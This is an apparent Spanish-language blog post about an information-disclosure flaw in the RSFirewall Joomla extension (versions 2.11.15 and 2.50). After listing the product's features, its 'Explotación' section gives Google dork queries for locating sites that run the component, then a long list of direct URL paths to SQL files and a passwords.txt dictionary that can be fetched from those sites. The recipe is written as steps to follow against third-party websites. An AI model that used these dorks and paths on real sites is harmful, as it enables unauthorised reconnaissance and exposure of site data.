Base de datos y divulgación de contraseña
RSFirewall es una extension de Joomla la cual nos ayuda a proteger nuestro Joomla en contra de ataques e intrusos.
Características principales:
- Escáner que realiza un seguimiento activo y bloquea cualquier intento de intrusión, como inyección SQL.
- Si tiene alguna fuga de seguridad, puede establecer el sitio en modo bloqueo.
- RSFirewall! protege todo el sitio web Joomla!, incluso de las vulnerabilidades de extensiones de terceros.
- Permite escanear y reparar vulnerabilidades (no son necesarios conocimientos de experto en seguridad).
- Explora activamente Joomla! archivos sensibles y rechaza los intentos de hackers para cambiarlos.
- Filtros de cualquier petición, como POST, GET, etc y bloquea los intentos de inyección SQL.
- Notifica por correo electrónico o incluso por SMS cuando un cierto nivel de alerta se genera.
- Siempre mantiene informado sobre las actualizaciones de seguridad más recientes.
- Permite establecer al instalador de extensiones de Joomla! en modo de bloqueo de seguridad, por lo que es imposible que alguien pueda acceder a las áreas protegidas de su sitio web.
- Protege al usuario administrador de tomas de posesión.
- Se activa Captcha después de intentos infructuosos de acceso a la administración de Joomla!.
- Permite establecer un bloqueo de IP por países.
VULNERABILIDAD
RSFirewall en sus versiones 2.11.15 y 2.50 tiene un fallo de seguridad o vulnerabilidad, la cual deja expuesta informacion sensible. Esta informacion sensible consiste en 2 archivos uno de ellos es un archivo .txt llamado "password.txt" el cual contiene una seria de contraseñas, a modo de diccionario.El segundo archivo .sql el cual tiene diversos nombres como:
- configuration.data.sql
- configuration.sql
- exceptions.sql
- feeds.data.sql
- feeds.sql
- hashes.data.sql
- hashes.sql
- ignored.sql
- lists.sql
- logs.sql
- offenders.sql
EXPLOTACION
Para poder explotar esta vulnerabilidad, debemos realizar una busqueda por medio de GoogleHacking con el siguientes dorks:[*] inurl:''/index.php?option=com_rsfirewall''
[*] inurl:''/administrator/components/com_rsfirewall/''
Una vez identificado un sitio "vulnerable" debemos de probar los siguientes direcciones.
- /administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql
- /administrator/components/com_rsfirewall/sql/mysql/configuration.sql
- /administrator/components/com_rsfirewall/sql/mysql/exceptions.sql
- /administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql
- /administrator/components/com_rsfirewall/sql/mysql/feeds.sql
- /administrator/components/com_rsfirewall/sql/mysql/hashes.data.sql
- /administrator/components/com_rsfirewall/sql/mysql/hashes.sql
- /administrator/components/com_rsfirewall/sql/mysql/ignored.sql
- /administrator/components/com_rsfirewall/sql/mysql/lists.sql
- /administrator/components/com_rsfirewall/sql/mysql/logs.sql
- /administrator/components/com_rsfirewall/sql/mysql/offenders.sql
- /administrator/components/com_rsfirewall/sql/mysql/signatures.data.sql
- /administrator/components/com_rsfirewall/sql/mysql/signatures.sql
- /administrator/components/com_rsfirewall/sql/mysql/snapshots.sql
- /administrator/components/com_rsfirewall/sql/mysql/uninstall.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/configuration.data.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/configuration.data.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/configuration.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/exceptions.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/feeds.data.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/feeds.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/hashes.data.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/hashes.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/ignored.sq
- /administrator/components/com_rsfirewall/sql/sqlazure/lists.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/logs.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/offenders.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/signatures.data.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/signatures.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/snapshots.sql
- /administrator/components/com_rsfirewall/sql/sqlazure/uninstall.sql
- /administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
Vulnerabilidad descubierta por: KingSkrupellos
0 Comentarios